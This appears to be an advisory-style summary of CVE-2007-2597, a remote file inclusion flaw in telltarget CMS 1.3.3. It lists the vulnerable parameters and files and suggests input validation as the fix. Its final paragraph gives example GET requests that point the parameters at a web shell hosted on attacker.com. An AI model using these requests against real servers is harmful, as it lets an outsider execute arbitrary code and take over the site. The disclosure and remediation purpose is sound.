CVE-2007-2597

An attacker can inject a remote URL into the `ordnertiefe` or `tt_docroot` parameters via HTTP GET requests. Because these parameters are passed directly to PHP file-inclusion functions without validation, the server will fetch and execute arbitrary PHP code from the attacker-controlled URL [ref_id=1]. The attack requires no authentication and can be performed over the network by simply appending the malicious parameter to any of the listed script paths [ref_id=1].

The vulnerability affects telltarget CMS version 1.3.3. The `ordnertiefe` parameter in `site_conf.php` and the `tt_docroot` parameter in multiple files under `functionen/`, `module/`, and `standard/` directories are used directly in PHP include/require statements without sanitization [ref_id=1]. The affected files include `class.csv.php`, `produkte_nach_serie.php`, `ref_kd_rubrik.php` (in functionen/), `hg_referenz_jobgalerie.php`, `surfer_anmeldung_NWL.php`, `produkte_nach_serie_alle.php`, `surfer_aendern.php`, `ref_kd_rubrik.php`, `referenz.php` (in module/), and `1/lay.php` and `3/lay.php` (in standard/) [ref_id=1].

No patch is provided in the bundle. The advisory does not include a vendor fix or remediation guidance [ref_id=1]. To close the vulnerability, the application must validate that the `ordnertiefe` and `tt_docroot` parameters contain only local, expected paths and reject any input containing URLs or directory traversal sequences. Alternatively, the application should use a whitelist of allowed include paths rather than accepting user-supplied values.

Send a GET request to any of the vulnerable scripts with a URL to a PHP shell as the parameter value. For example: `[Path]/phplib/site_conf.php?ordnertiefe=http://attacker.com/shell.txt` or `[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=http://attacker.com/shell.txt` [ref_id=1]. The server will include and execute the remote PHP code.